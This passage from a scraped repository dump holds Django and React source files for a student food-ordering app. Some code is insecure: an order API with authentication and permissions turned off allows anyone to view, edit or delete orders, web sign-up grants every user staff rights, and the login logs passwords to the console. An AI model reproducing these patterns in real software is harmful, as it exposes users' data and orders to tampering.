"text": "from .AuthForms import *\r\nfrom .HotelForms import *\r\nfrom .LocationForms import *\r\nfrom .ProductsForms import *"
},
{
"alpha_fraction": 0.6425379514694214,
"alphanum_fraction": 0.6550491452217102,
"avg_line_length": 44.54166793823242,
"blob_id": "08995fa1d21621cd94ad4f3355f2db98a1852d3c",
"content_id": "9da8e26db51271f2c72e471f37e28531c23c8f43",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1119,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 24,
"path": "/foodcartapp/serializers/CustomerSerializer.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.models import User\r\nfrom rest_framework import serializers\r\n\r\n# CustomUser in and as Customer\r\n\r\nclass CustomerSerializer(serializers.Serializer):\r\n username=serializers.CharField(max_length=50)\r\n password=serializers.CharField(max_length=50)\r\n first_name=serializers.CharField(max_length=50)\r\n last_name=serializers.CharField(max_length=50)\r\n phone_number=serializers.CharField(max_length=10)\r\n pincode=serializers.CharField(max_length=7)\r\n address=serializers.CharField(max_length=256)\r\n\r\n def create(self, validated_data):\r\n user=User.objects.create_user(username=validated_data['username'],\r\n password=validated_data['password'],\r\n first_name=validated_data['first_name']\r\n ,last_name=validated_data['last_name'])\r\n user.customuser.phone_number=validated_data['phone_number']\r\n user.customuser.pincode=validated_data['pincode']\r\n user.customuser.address=validated_data['address']\r\n user.save()\r\n return user\r\n\r\n"
},
{
"alpha_fraction": 0.7373737096786499,
"alphanum_fraction": 0.7445887327194214,
"avg_line_length": 32.650001525878906,
"blob_id": "141075cdfe995a76f547cfadd44679a7d752c01e",
"content_id": "49d655ddbc42df94264cc1e3165794464e970589",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 693,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 20,
"path": "/foodcartapp/serializers/order_serializer.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "import datetime\r\n\r\nfrom django.contrib.auth.models import User\r\nfrom rest_framework import serializers\r\n\r\nfrom foodcartapp.models import Order\r\n\r\n\r\nclass OrderSerializer(serializers.Serializer):\r\n customer_id =serializers.IntegerField()\r\n status = serializers.IntegerField(default=1)\r\n order_time = serializers.DateTimeField(default=datetime.datetime.now())\r\n delivery_time = serializers.DateTimeField(default=datetime.datetime.now())\r\n amount = serializers.DecimalField(max_digits=15, decimal_places=2)\r\n order_type = serializers.IntegerField(default=1)\r\n\r\n\r\n def create(self, validated_data):\r\n order=Order.objects.create(**validated_data)\r\n return order\r\n"
},
{
"alpha_fraction": 0.5072265863418579,
"alphanum_fraction": 0.5115898847579956,
"avg_line_length": 31.953702926635742,
"blob_id": "89c13b94ad05a41a038e7a82773a0a070c4cdbd7",
"content_id": "173ad6642248bc776819770e431e238d963d63a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3667,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 108,
"path": "/src/components/LoginModalComponent.js",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "import React, { Component } from 'react'\r\nimport Cookies from 'universal-cookie';\r\nimport {Redirect} from 'react-router-dom'\r\nimport { withRouter } from 'react-router'\r\nimport { Button } from 'react-bootstrap';\r\nimport {Modal} from 'react-bootstrap';\r\n\r\n\r\nclass LoginModalComponent extends Component{\r\n\r\n constructor(props){\r\n super(props);\r\n }\r\n\r\n cookies = new Cookies();\r\n state = {\r\n auth_url : 'api-basictoken-auth/',\r\n jwt_url : 'api-jwttoken-auth/',\r\n //buttonName : 'Login',\r\n username : \"\" ,\r\n password: \"\"\r\n }\r\n\r\n saveUsername = (event) => {\r\n const {target : {value}} = event;\r\n this.setState({\r\n username : value\r\n })\r\n }\r\n\r\n savePassword = (event) => {\r\n const {target : {value}} = event;\r\n this.setState({\r\n password : value\r\n })\r\n }\r\n\r\n submit = (e) => {\r\n e.preventDefault();\r\n // const {username, password} = this.state\r\n this.login(this.state)\r\n }\r\n\r\n\r\n login = ({username, password}) =>\r\n {\r\n console.log(username + \" : \"+password);\r\n var formData = new FormData();\r\n formData.append('username', username);\r\n formData.append('password', password);\r\n\r\n fetch(this.state.jwt_url, { \r\n method: 'post',\r\n body: formData, \r\n }) .then(function(response) {\r\n return response.json();\r\n })\r\n .then((myJson) => {\r\n if ('token' in myJson){\r\n this.cookies.set('userJwtToken', myJson, { path: '/',expires: new Date(Date.now()+2592000)} );\r\n this.cookies.set('username',formData.get('username'), {path : '/', expires: new Date(Date.now()+2592000)})\r\n console.log(this.cookies.get('userJwtToken'));\r\n //this.props.updateUsername(formData.get('username'));\r\n //this.props.updateStatus(true);\r\n //this.setState(prev => ( {buttonName : 'Logout'}));\r\n console.log('After getting token');\r\n //this.props.history.push('/');\r\n this.props.toggleisAuthenticated();\r\n this.props.handleLoginModalClose();\r\n //console.log(\"Redirecting....\")\r\n }\r\n else{\r\n alert(\"Invalid Credentials\");\r\n }\r\n })\r\n .catch(e => {console.log(\"Error occured in Login\")});\r\n }\r\n\r\n render(){\r\n return (\r\n\r\n <Modal show={this.props.loginModalActive} onHide={this.props.handleLoginModalClose}>\r\n <Modal.Header closeButton>\r\n <h2><center><Modal.Title>Login</Modal.Title></center></h2>\r\n </Modal.Header>\r\n <Modal.Body> \r\n <div className=\"form-group container-fluid\">\r\n <label htmlFor=\"username\">Username:</label>\r\n <input onChange={this.saveUsername} id=\"username\" type=\"text\" className=\"form-control\" placeholder=\"Enter username\"/><br/>\r\n <label htmlFor=\"password\">Password:</label>\r\n <input onChange={this.savePassword} type=\"password\" className=\"form-control\" placeholder=\"Enter Password\"/><br/>\r\n \r\n </div>\r\n \r\n </Modal.Body>\r\n <Modal.Footer>\r\n <Button onClick={this.submit} className=\"btn btn-primary\" value=\"Login\">Login</Button>\r\n <Button onClick={this.props.handleLoginModalClose}>Close</Button>\r\n </Modal.Footer>\r\n </Modal>\r\n \r\n\r\n \r\n )\r\n }\r\n}\r\n\r\nexport default LoginModalComponent;\r\n"
},
{
"alpha_fraction": 0.7318181991577148,
"alphanum_fraction": 0.7318181991577148,
"avg_line_length": 35.25423812866211,
"blob_id": "fc9479864d9d39214ca0e6d6cbfae26b43dfc2bc",
"content_id": "b857d5fd9a9648db6c6f19cc498d71496d449993",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2200,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 59,
"path": "/foodcartapp/views/CityViews.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.mixins import LoginRequiredMixin, PermissionRequiredMixin\r\nfrom django.core.exceptions import PermissionDenied\r\nfrom django.shortcuts import redirect\r\nfrom django.urls import reverse_lazy\r\nfrom django.views.generic import ListView, CreateView,UpdateView,DeleteView\r\n\r\nfrom foodcartapp.forms.CityForms import UpdateCity, AddCity\r\nfrom foodcartapp.forms.LocationForms import AddLocation, UpdateLocation\r\nfrom foodcartapp.models import *\r\nfrom datetime import datetime\r\n\r\n\r\nclass PermissionHelper(PermissionRequiredMixin):\r\n def has_permission(self):\r\n if self.request.user.is_superuser:\r\n return True\r\n else:\r\n raise PermissionDenied\r\n\r\n\r\nclass city_list_view(PermissionHelper,ListView):\r\n login_url = \"/login/\"\r\n permission_denied_message = \"User is not Authorized\"\r\n model =City\r\n template_name = \"city_list.html\"\r\n context_object_name = \"city_list\"\r\n\r\n\r\n\r\nclass AddCityView(LoginRequiredMixin,PermissionHelper,CreateView):\r\n login_url = reverse_lazy(\"foodcartapp:login\")\r\n template_name = 'add_city.html'\r\n form_class = AddCity\r\n # permission_required = \"foodcartapp.add_location\"\r\n permission_denied_message = \"User does not have permission to add City\"\r\n raise_exception = True\r\n model = City\r\n success_url = reverse_lazy(\"foodcartapp:CitiesView\")\r\n\r\n\r\nclass UpdateCityView(LoginRequiredMixin,PermissionHelper,UpdateView):\r\n login_url = reverse_lazy(\"foodcartapp:login\")\r\n model = City\r\n #permission_required = \"foodcartapp.change_city\"\r\n permission_denied_message = \"User does not have permission to change City\"\r\n raise_exception = True\r\n form_class = UpdateCity\r\n template_name = \"update_city.html\"\r\n success_url = reverse_lazy(\"foodcartapp:CitiesView\")\r\n\r\n\r\nclass DeleteCityView(LoginRequiredMixin,PermissionHelper,DeleteView):\r\n login_url = reverse_lazy(\"foodcartapp:login\")\r\n model = City\r\n template_name = \"city_confirm_delete.html\"\r\n permission_required = \"foodcartapp.delete_city\"\r\n permission_denied_message = \"User does not have permission to delete city\"\r\n raise_exception = True\r\n success_url = reverse_lazy(\"foodcartapp:CitiesView\")\r\n\r\n"
},
{
"alpha_fraction": 0.3599003851413727,
"alphanum_fraction": 0.36239102482795715,
"avg_line_length": 24.66666603088379,
"blob_id": "b8b5d1afacb749e94c416c974f555bd75414f388",
"content_id": "b17ad4b4848a4020c2d298a5b5aa835af3f5aeff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 803,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 30,
"path": "/foodcartapp/templates/hotel_list.html",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "\r\n {% extends 'header.html' %}\r\n {% block content %}\r\n\r\n <center><h2>Hotels of {{Name}}</h2></center>\r\n <hr/>\r\n\r\n <div class=\"container\">\r\n <table class=\"table table-responsive\">\r\n <tr>\r\n <th>Id</th>\r\n <th>Name</th>\r\n <th>Location</th>\r\n <th>GST</th>\r\n <th>Edit/Delete</th>\r\n </tr>\r\n\r\n {% for i in hotel_list %}\r\n <tr>\r\n <td>{{i.id}}</td>\r\n <td>{{i.name}}</td>\r\n <td>{{i.location.name}}</td>\r\n <td>{{i.gst}}</td>\r\n <td><a href=\"/{{i.id}}/editHotel/\">Edit/</a><a href=\"/{{i.id}}/deleteHotel/\">Delete</a></td>\r\n </tr>\r\n\r\n {% endfor %}\r\n\r\n </table>\r\n </div>\r\n {% endblock %}\r\n"
},
{
"alpha_fraction": 0.6591549515724182,
"alphanum_fraction": 0.666353702545166,
"avg_line_length": 37.9375,
"blob_id": "3fb13d3f441711da7d5fc3caa42a6f839c1ba03f",
"content_id": "7c1b8f0ade09301af9643a4ba0add10834e240a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3195,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 80,
"path": "/foodcartapp/RESTviews/OrderRestView.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.models import User\r\nfrom rest_framework import status\r\nfrom rest_framework.authentication import SessionAuthentication, BasicAuthentication\r\nfrom rest_framework.decorators import api_view, authentication_classes, permission_classes\r\nfrom rest_framework.permissions import IsAuthenticated\r\nfrom rest_framework.response import Response\r\nfrom foodcartapp.models import Product, Order\r\nfrom foodcartapp.serializers.order_serializer import OrderSerializer\r\nfrom foodcartapp.serializers.orderdetails_serializer import OrderDetailsSerializer\r\nfrom foodcartapp.serializers.product_serializer import ProductSerializer\r\nimport datetime\r\n\r\n\r\n@api_view(['POST'])\r\ndef order_list_api(request):\r\n \"\"\"\r\n List all code snippets, or create a new snippet.\r\n \"\"\"\r\n # if request.method == 'GET':\r\n # products = Product.objects.all()\r\n # serializer = ProductSerializer(products, many=True)\r\n # return Response(serializer.data)\r\n\r\n if request.method == 'POST':\r\n order_data={}\r\n order_data['customer_id']=request.user.id\r\n order_data['status']=1\r\n order_data['order_time']=datetime.datetime.now()\r\n order_data['amount']=request.data['amount']\r\n order_data['order_type']=1 ### default order_type set to Cash On Delivery Payment interface to be integrated\r\n\r\n products=request.data.pop('products')\r\n order_serializer = OrderSerializer(data=order_data)\r\n\r\n if order_serializer.is_valid():\r\n order=order_serializer.save()\r\n for product in products:\r\n orderdetails_data={}\r\n orderdetails_data['product_id']=product['id']\r\n orderdetails_data['quantity']=product['quantity']\r\n orderdetails_data['order_id']=order.id\r\n orderdetail_serializer=OrderDetailsSerializer(data=orderdetails_data)\r\n if orderdetail_serializer.is_valid():\r\n orderdetail_serializer.save()\r\n\r\n return Response(order_serializer.data, status=status.HTTP_201_CREATED)\r\n return Response(order_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n else:\r\n return Response(status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\n@api_view(['GET', 'PUT', 'DELETE'])\r\n@authentication_classes(())\r\n@permission_classes(())\r\ndef order_detail_api(request, pk):\r\n \"\"\"\r\n Retrieve, update or delete a code snippet.\r\n \"\"\"\r\n try:\r\n order = Order.objects.get(pk=pk)\r\n except order.DoesNotExist:\r\n return Response(status=status.HTTP_404_NOT_FOUND)\r\n\r\n if request.method == 'GET':\r\n serializer = ProductSerializer(order)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'PUT':\r\n serializer = OrderSerializer(order, data=request.query_params)\r\n if serializer.is_valid():\r\n serializer.save()\r\n\r\n return Response(serializer.data)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n elif request.method == 'DELETE':\r\n order.delete()\r\n return Response(status=status.HTTP_204_NO_CONTENT)\r\n else:\r\n return Response(status=status.HTTP_400_BAD_REQUEST)\r\n"
},
{
"alpha_fraction": 0.6648721694946289,
"alphanum_fraction": 0.6662180423736572,
"avg_line_length": 41.47058868408203,
"blob_id": "e038bf04e2b838889e9d3d043ba03b11fed68d1a",
"content_id": "046e2c38dc562e0bb2ff0edbe611969e628e56b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 743,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 17,
"path": "/foodcartapp/views/OrderViews.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from django.views.generic import ListView\r\nfrom foodcartapp.models import *\r\n\r\n\r\nclass order_list_view(ListView):\r\n model =OrderDetails\r\n template_name = \"order_list.html\"\r\n context_object_name = \"orderdetails_list\"\r\n\r\n def get_context_data(self,**kwargs):\r\n context=super(order_list_view,self).get_context_data(**kwargs)\r\n #print(context)\r\n context['orders_list']=OrderDetails.objects.filter(product__hotel__hoteladmin__user__id=self.request.user.id)\r\n context['Name']=User.objects.get(id=self.request.user.id).username\r\n # if(len(context['card_list'])!=0):\r\n # context['hotel']=Product.objects.values('hotel__name').filter(user__id=self.request.user.id)\r\n return context\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6096654534339905,
"alphanum_fraction": 0.6096654534339905,
"avg_line_length": 15.533333778381348,
"blob_id": "8cb8fed823b94b05441ac20552f211c88e7221de",
"content_id": "14e0ba0e24ed477968626fd2933e077790e0bdad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 269,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 15,
"path": "/foodcartapp/forms/ProductsForms.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from django.forms import ModelForm\r\nfrom foodcartapp.models import *\r\n\r\n\r\n\r\nclass AddProduct(ModelForm):\r\n class Meta:\r\n model=Product\r\n exclude=[]\r\n\r\n\r\nclass UpdateProduct(ModelForm):\r\n class Meta:\r\n model=Product\r\n exclude=[]\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.84375,
"alphanum_fraction": 0.84375,
"avg_line_length": 32,
"blob_id": "58808c9a276c3ccdad7b98bf5f2c18399287249c",
"content_id": "a7e5ad5d5a7c38a34978b5f285d31120681e401c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 32,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 1,
"path": "/foodcartapp/RESTviews/__init__.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from .LocationsRestView import *"
},
{
"alpha_fraction": 0.4863034784793854,
"alphanum_fraction": 0.4863034784793854,
"avg_line_length": 43.15277862548828,
"blob_id": "b94ef0bdedcd658215c1c43354532ed545e2781f",
"content_id": "69cbeadace056a19ba91632cc60b24973aa057cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3249,
"license_type": "no_license",
"max_line_length": 185,
"num_lines": 72,
"path": "/src/components/NavBarComponent.js",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "import React, { Component } from 'react'\r\nimport Cookies from 'universal-cookie';\r\n\r\nclass NavBarComponent extends Component{\r\n\r\n constructor(props){\r\n super(props);\r\n }\r\n\r\n cookies = new Cookies();\r\n logout = (props) =>\r\n {\r\n this.cookies.remove('userJwtToken');\r\n this.cookies.remove('username');\r\n console.log(this.cookies.get('userJwtToken'));\r\n this.props.toggleisAuthenticated();\r\n // console.log(formData.get('username'))\r\n //this.props.updateUsername('');\r\n //this.props.updateStatus(false);\r\n //this.setState(prev => ( {buttonName : 'Login'}));\r\n }\r\n\r\n\r\n render(){\r\n\r\n\r\n return (\r\n <div className=\"container-fluid\">\r\n <nav className=\"navbar navbar-inverse navbar-fixed-top\">\r\n <div className=\"container-fluid\">\r\n <div className=\"navbar-header\">\r\n <button type=\"button\" className=\"navbar-toggle\" data-toggle=\"collapse\" data-target=\"#myNavbar\">\r\n <span className=\"icon-bar\"></span>\r\n <span className=\"icon-bar\"></span>\r\n <span className=\"icon-bar\"></span> \r\n </button>\r\n <a className=\"navbar-brand\" href=\"#\">FoodCart</a>\r\n </div>\r\n <div>\r\n <div className=\"collapse navbar-collapse\" id=\"myNavbar\">\r\n <ul className=\"nav navbar-nav\">\r\n <li><a href=\"#what_we_do\">What we do</a></li>\r\n <li><a href=\"#restaurants\">Restaurants</a></li>\r\n <li><a href=\"#foodcart_specials\">FoodCart Specials</a></li>\r\n <li><a href=\"#products\">Order Now</a></li>\r\n <li><a href=\"#contact_us\">Contact Us</a></li>\r\n { !this.props.isAuthenticated && <li><a href=\"#\" onClick={this.props.handleLoginModalShow}><span className=\"glyphicon glyphicon-log-in\"></span> Login</a></li> }\r\n { !this.props.isAuthenticated && <li><a href=\"#\" onClick={this.props.handleSignupModalShow}><span className=\"glyphicon glyphicon-user\"></span> Signup</a></li> }\r\n {this.props.isAuthenticated && <li><a href=\"#\" onClick={this.logout}>Logout</a></li>}\r\n </ul>\r\n <ul className=\"nav navbar-nav navbar-right\">\r\n <li><a>Total Items:{this.props.totalItems ? <span>{this.props.totalItems}</span> : \"\" }</a></li>\r\n <li><a>Total Amount:{this.props.totalAmount ? <span>{this.props.totalAmount}</span> : \"\" }</a></li>\r\n <li style={{float:'right'}}>\r\n <a onClick={this.props.handleCartShow}>\r\n <button type=\"button\" href=\"#\" className=\"btn btn-primary btn-sm\">\r\n <span className=\"glyphicon glyphicon-shopping-cart\"></span> View Cart\r\n </button>\r\n </a>\r\n </li>\r\n </ul>\r\n </div>\r\n </div>\r\n </div>\r\n </nav> \r\n </div>\r\n );\r\n }\r\n\r\n}\r\n\r\nexport default NavBarComponent;"
},
{
"alpha_fraction": 0.5880669951438904,
"alphanum_fraction": 0.5880669951438904,
"avg_line_length": 31.547945022583008,
"blob_id": "9e71e8fa030d7953aa103000de60947daf507254",
"content_id": "9ef6685f785fd8739e60c367cc0c515604506526",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2447,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 73,
"path": "/foodcartapp/views/AuthViews.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth import authenticate, login, logout\r\nfrom django.views import View\r\nfrom foodcartapp.forms import *\r\nfrom django.shortcuts import *\r\nfrom django.contrib.auth.models import *\r\nfrom foodcartapp.forms.AuthForms import Signup, Login\r\n\r\n\r\n#\r\n\r\nclass SignUpView(View):\r\n def get(self,request,*args,**kwargs):\r\n form=Signup()\r\n return render(request,\"sign_up.html\",context={'title':'SignUp','form':form})\r\n\r\n def post(self,request):\r\n form=Signup(request.POST)\r\n\r\n if form.is_valid():\r\n username=form.cleaned_data['username']\r\n password=form.cleaned_data['password']\r\n\r\n\r\n user=User.objects.create_user(username=username,password=password)\r\n user.customuser.phone_number=form.cleaned_data['phone_number']\r\n user.customuser.address=form.cleaned_data['address']\r\n user.customuser.pincode=form.cleaned_data['pincode']\r\n\r\n staff=Group.objects.get(name=\"HotelAdmins\")\r\n staff.user_set.add(user)\r\n user.is_staff=True\r\n user.save()\r\n user=authenticate(request,username=username,password=password)\r\n\r\n if user is not None:\r\n login(request,user)\r\n return redirect('foodcartapp:HotelView')\r\n else:\r\n raise PermissionDenied\r\n\r\n\r\nclass LoginView(View):\r\n def get(self,request,*args,**kwargs):\r\n if(request.user.is_authenticated):\r\n if request.user.is_staff:\r\n return redirect(\"foodcartapp:HotelView\")\r\n else:\r\n raise PermissionDenied\r\n\r\n form=Login()\r\n return render(request,\"login.html\",context={'title':'Login | User','form':form})\r\n\r\n def post(self,request):\r\n form = Login(request.POST)\r\n if form.is_valid():\r\n username=form.cleaned_data['username']\r\n password=form.cleaned_data['password']\r\n\r\n user = authenticate(request, username=username, password=password)\r\n if user is not None:\r\n login(request,user)\r\n if user.is_staff:\r\n return redirect(\"foodcartapp:HotelView\")\r\n else:\r\n raise PermissionDenied\r\n else:\r\n raise PermissionDenied\r\n\r\n\r\nclass LogoutView(View):\r\n def get(self, request):\r\n logout(request)\r\n return redirect(\"foodcartapp:Login\")"
},
{
"alpha_fraction": 0.7010378241539001,
"alphanum_fraction": 0.7137596011161804,
"avg_line_length": 34.77777862548828,
"blob_id": "80517877e977dfacf57ab23417d13b1d0f8709f5",
"content_id": "6f2874024f15acb42ab2ebaeed08502de274c40f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2987,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 81,
"path": "/foodcartapp/models.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.models import User\r\nfrom django.db import models\r\n\r\n# Create your models here.\r\nfrom django.db.models.signals import post_save\r\nfrom django.dispatch import receiver\r\n\r\n\r\nclass City(models.Model):\r\n name=models.CharField(max_length=50)\r\n state=models.CharField(max_length=50)\r\n\r\n\r\nclass Location(models.Model):\r\n name=models.CharField(max_length=50)\r\n pincode = models.CharField(max_length=7)\r\n city=models.ForeignKey(City,on_delete=models.CASCADE)\r\n\r\n\r\nclass CustomUser(models.Model):\r\n user = models.OneToOneField(User, on_delete=models.CASCADE)\r\n phone_number = models.CharField(max_length=10)\r\n pincode = models.CharField(max_length=7)\r\n address = models.CharField(max_length=256)\r\n\r\n @receiver(post_save, sender=User)\r\n def create_user_profile(sender, instance, created, **kwargs):\r\n if created:\r\n CustomUser.objects.create(user=instance)\r\n\r\n @receiver(post_save, sender=User)\r\n def save_user_profile(sender, instance, **kwargs):\r\n instance.customuser.save()\r\n\r\n\r\n# class HotelAdmin(models.Model):\r\n# user = models.OneToOneField(User, on_delete=models.CASCADE)\r\n# phone_number = models.CharField(max_length=10)\r\n# pincode = models.CharField(max_length=7)\r\n# address = models.CharField(max_length=256)\r\n#\r\n# @receiver(post_save, sender=User)\r\n# def create_user_profile(sender, instance, created, **kwargs):\r\n# if created:\r\n# HotelAdmin.objects.create(user=instance)\r\n#\r\n# @receiver(post_save, sender=User)\r\n# def save_user_profile(sender, instance, **kwargs):\r\n# instance.hoteladmin.save()\r\n\r\n\r\nclass Hotel(models.Model):\r\n name=models.CharField(max_length=50)\r\n location=models.ForeignKey(Location,on_delete=models.CASCADE)\r\n gst=models.DecimalField(max_digits=4,decimal_places=2)\r\n hoteladmin = models.ForeignKey(CustomUser, on_delete=models.CASCADE)\r\n\r\n\r\nclass Product(models.Model):\r\n name=models.CharField(max_length=50)\r\n half_price=models.DecimalField(max_digits=8,decimal_places=2)\r\n full_price=models.DecimalField(max_digits=8,decimal_places=2)\r\n availabilty=models.BooleanField(default=True)\r\n image=models.ImageField()\r\n special_status=models.BooleanField(default=False)\r\n category = models.CharField(max_length=50)\r\n hotel=models.ForeignKey(Hotel,on_delete=models.CASCADE)\r\n\r\nclass Order(models.Model):\r\n customer=models.ForeignKey(CustomUser,on_delete=models.SET_NULL,null=True)\r\n status=models.SmallIntegerField(default=1)\r\n order_time=models.DateTimeField()\r\n delivery_time=models.DateTimeField(blank=True,null=True)\r\n amount=models.DecimalField(max_digits=15,decimal_places=2)\r\n order_type=models.SmallIntegerField(default=1)\r\n\r\n\r\nclass OrderDetails(models.Model):\r\n product=models.ForeignKey(Product,on_delete=models.CASCADE)\r\n quantity=models.DecimalField(max_digits=8,decimal_places=2)\r\n order=models.ForeignKey(Order,on_delete=models.CASCADE)\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.7041860222816467,
"alphanum_fraction": 0.7125581502914429,
"avg_line_length": 37.74074172973633,
"blob_id": "4166bee92d2e2b1ab7a7c3ead7a6b8674e4b785e",
"content_id": "f99f7dadda6e205ec7a65db75a0cda1f36cd6521",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1075,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 27,
"path": "/foodcartapp/RESTviews/UserRestView.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.models import User, Group\r\nfrom rest_framework import status\r\nfrom rest_framework.authtoken.models import Token\r\nfrom rest_framework.decorators import api_view, authentication_classes, permission_classes\r\nfrom rest_framework.response import Response\r\nfrom foodcartapp.serializers.CustomerSerializer import CustomerSerializer\r\n\r\n\r\n\r\n@api_view(['POST'])\r\n@authentication_classes(())\r\n@permission_classes(())\r\ndef customer_signup_api(request):\r\n\r\n if request.method == 'POST':\r\n customerserializer = CustomerSerializer(data=request.data)\r\n\r\n if customerserializer.is_valid():\r\n user=customerserializer.save()\r\n customer=Group.objects.get(name=\"Customers\")\r\n customer.user_set.add(user)\r\n\r\n token, created = Token.objects.get_or_create(user=user)\r\n return Response({'token': token.key}, status=status.HTTP_201_CREATED)\r\n return Response(customerserializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n else:\r\n return Response(status=status.HTTP_400_BAD_REQUEST)\r\n\r\n"
},
{
"alpha_fraction": 0.7295056581497192,
"alphanum_fraction": 0.7295056581497192,
"avg_line_length": 50.5,
"blob_id": "7a70e3cad64406203ee7fb226d53721522d0c2eb",
"content_id": "67301d89bd0e6752d795446cb5116e687c8eeb32",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3257,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 62,
"path": "/foodcartapp/urls.py",
"repo_name": "rawda-yasser/FoodOrder_Django",
"src_encoding": "UTF-8",
"text": "from django.urls import path\r\n\r\nfrom foodcartapp.RESTviews.CityRestView import city_list_api, city_detail_api\r\nfrom foodcartapp.RESTviews.LocationsRestView import location_list_api\r\nfrom foodcartapp.RESTviews.OrderRestView import order_list_api, order_detail_api\r\nfrom foodcartapp.RESTviews.ProductRestView import product_list_api, product_detail_api\r\nfrom foodcartapp.RESTviews.UserRestView import customer_signup_api\r\nfrom foodcartapp.views.CityViews import city_list_view, AddCityView, UpdateCityView, DeleteCityView\r\nfrom foodcartapp.views.HotelViews import hotel_list_view, DeleteHotelView, UpdateHotelView, AddHotelView\r\nfrom foodcartapp.views.OrderViews import order_list_view\r\nfrom foodcartapp.views.ProductViews import product_list_view, AddProductView, UpdateProductView, DeleteProductView\r\nfrom foodcartapp.views.AuthViews import LoginView, LogoutView, SignUpView\r\nfrom foodcartapp.views.LocationViews import location_list_view,AddLocationView,DeleteLocationView,UpdateLocationView\r\nfrom foodcartapp.RESTviews import *\r\n\r\napp_name=\"foodcartapp\"\r\n\r\nurlpatterns=[\r\n\r\n path('products/',product_list_view.as_view(),name=\"ProductsView\"),\r\n path('addproduct/',AddProductView.as_view(),name=\"AddProductView\"),\r\n path('<int:pk>/editProduct/',UpdateProductView.as_view(),name=\"UpdateProductView\"),\r\n path('<int:pk>/deleteProduct/',DeleteProductView.as_view(),name=\"DeleteProductView\"),\r\n\r\n path('locations/',location_list_view.as_view(),name=\"LocationsView\"),\r\n path('addlocation/',AddLocationView.as_view(),name=\"AddLocationView\"),\r\n path('<int:pk>/editLoction/',UpdateLocationView.as_view(),name=\"UpdateLocationView\"),\r\n path('<int:pk>/deleteLoction/',DeleteLocationView.as_view(),name=\"DeleteLocationView\"),\r\n\r\n path('hotels/', hotel_list_view.as_view(), name=\"HotelView\"),\r\n path('addhotel/', AddHotelView.as_view(), name=\"AddHotelView\"),\r\n path('<int:pk>/editHotel/', UpdateHotelView.as_view(), name=\"UpdateHotelView\"),\r\n path('<int:pk>/deleteHotel/', DeleteHotelView.as_view(), name=\"DeleteHotelView\"),\r\n\r\n\r\n path('cities/', city_list_view.as_view(), name=\"CitiesView\"),\r\n path('addcity/', AddCityView.as_view(), name=\"AddCityView\"),\r\n path('<int:pk>/editCity/', UpdateCityView.as_view(), name=\"UpdateCityView\"),\r\n path('<int:pk>/deleteCity/', DeleteCityView.as_view(), name=\"DeleteCityView\"),\r\n\r\n path('orders/',order_list_view.as_view(),name=\"OrderListView\"),\r\n\r\n path('login/',LoginView.as_view(),name=\"Login\"),\r\n path('logout/',LogoutView.as_view(),name=\"Logout\"),\r\n path('sign_up/',SignUpView.as_view(),name=\"Signup\"),\r\n\r\n 